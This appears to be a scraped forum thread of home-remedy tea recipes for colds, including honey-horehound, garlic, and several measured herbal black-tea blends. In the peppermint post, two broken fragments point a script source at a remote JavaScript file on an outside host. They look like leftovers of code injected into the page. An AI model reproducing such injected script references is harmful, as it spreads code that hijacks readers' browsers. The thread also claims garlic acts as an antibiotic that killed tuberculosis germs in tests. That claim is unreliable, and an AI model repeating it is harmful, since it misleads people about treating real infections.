tea to get rid of cold

tea80% hony10% horehond (the plant or the cogh drop thay are prety much thesame ) ginco bilbora and limon juce10%

i put %s on the stuff that makes up the main liquid body
the other ingredints are added to and dont forget suger
this stuff can bitter and some times just nasty

Heres what never fails me. Garlic tea,I know sounds yuck! lol
Get 3 cloves chop them up into pieces. get a cup of water maybe a cup and half. Boil garlic in it. When the garlic is transparent drink.
Garlic is a natural anti- viral,anti- biotic and natural anti- fungal. And in tests has killed the Tb germ.

peppermint, lemon, and honey....never fails for me, but the peppermint can be substituted for say...a rose hip brew instead if you can't drink peppermint. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

2 tsp. black tea
1 tsp. elder flower
1 tsp. peppermint
1 tsp. yarrow.

tea cold 2
2 tsp. black tea
1 tsp. chamomile
1 tsp. elder flower
1/2 tsp. hyssop
1/2 tsp. lemon balm
1 1/2 tep. rose hips.

tea cold 3

2 tsp. black tea
1/8 tsp. ginger
1 tsp. yarrow
1 tsp. mint.
